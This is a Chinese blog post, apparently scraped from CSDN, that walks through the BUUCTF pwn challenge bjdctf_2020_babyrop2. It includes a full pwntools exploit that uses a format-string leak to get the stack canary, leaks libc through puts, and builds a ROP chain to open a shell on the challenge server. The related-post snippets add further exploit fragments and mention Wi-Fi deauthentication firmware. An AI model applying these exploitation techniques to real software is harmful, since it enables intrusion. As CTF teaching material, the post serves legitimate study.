[BUUCTF-pwn]——bjdctf_2020_babyrop2

最新推荐文章于 2022-10-27 10:12:51 发布
最新推荐文章于 2022-10-27 10:12:51 发布
阅读量287 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114102061
版权

[BUUCTF-pwn]——bjdctf_2020_babyrop2

还是先checksec一下。开启了canary
在这里插入图片描述
在IDA中,一看发现思路很清楚呀
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

思路

给的提示好明显,
第一个函数给你提示,泄露libc
第二个格式化字符串漏洞,泄露canary
第三个函数栈溢出,有了canary和puts函数,我们就可以泄露出libc,进而构造获得shell的rop链

exploit

from pwn import *
from LibcSearcher import *
#p = process('./bjdctf_2020_babyrop2')
p =remote('node3.buuoj.cn',25755)
elf = ELF('./bjdctf_2020_babyrop2')

#gdb.attach(p, 'b *0x0000000000400857')
pop_rdi = 0x0000000000400993
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln = elf.symbols['vuln']
payload = '%7$p'
p.recv()
p.sendline(payload)

p.recvuntil('0x')
canary = int(p.recv(16),16)

payload = 'a' * (0x20 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)

p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(puts_addr)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x20 - 8) + p64(canary) + 'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)

p.sendlineafter('Pull up your sword and tell me u story!\n',payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTFbjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 920
BUUCTFbjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
pwn7第七关
qq_18823653的博客
04-03 398
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 297
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
bjdctf_2020_babyrop2
、moddemod
07-06 576
注意这题开启了Canary 因为限制了payload长度就不可以写got表了,但是可以直接泄露Canary值,在vuln中进行栈溢出即可拿到shell… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bjdctf_2020_babyrop2' elf = ELF(proc_name) p = process(proc_name) p = remote('node3..
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2940
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BUUCTF(pwn)bjdctf_2020_babyrop
半岛铁盒的博客
03-31 436
from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',25519) elf=ELF('./2') main=0x4006ad rdi=0x400733 puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] payload='a'*(0x20+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendl...
BUUCTFbjdctf_2020_babyrop2
m0_51251108的博客
12-30 375
BUUCTFbjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 774
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shell。ROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 436
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
BUUOJ PWN bjdctf_2020_babyrop2
weixin_50287973的博客
11-12 206
开启的安全机制 main gift 利用格式化字符串泄露canary vuln 栈溢出泄露libc 栈溢出执行system(“bin/sh\x00”) scanf允许输入6字节,输入参数,输出偏移为6的地址,canary的偏移就为7 这样输入%7$p就可以泄露canary EXP from pwn import * from LibcSearcher import LibcSearcher p = remote("node3.buuoj.cn",27004) elf = ELF("./bjdc
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 411
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
bjdctf_2020_babyrop
m0_52231248的博客
11-15 905
bjdctf_2020_babyrop Ubuntu16 Checksec: Ida: 标准的ret2libc,有puts函数,offest=0x28 Exp: from pwn import * from LibcSearcher import * context(log_level='debug') p = remote("node4.buuoj.cn",26832) elf = ELF('./bjdctf_2020_babyrop') read_got = elf.got['re
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值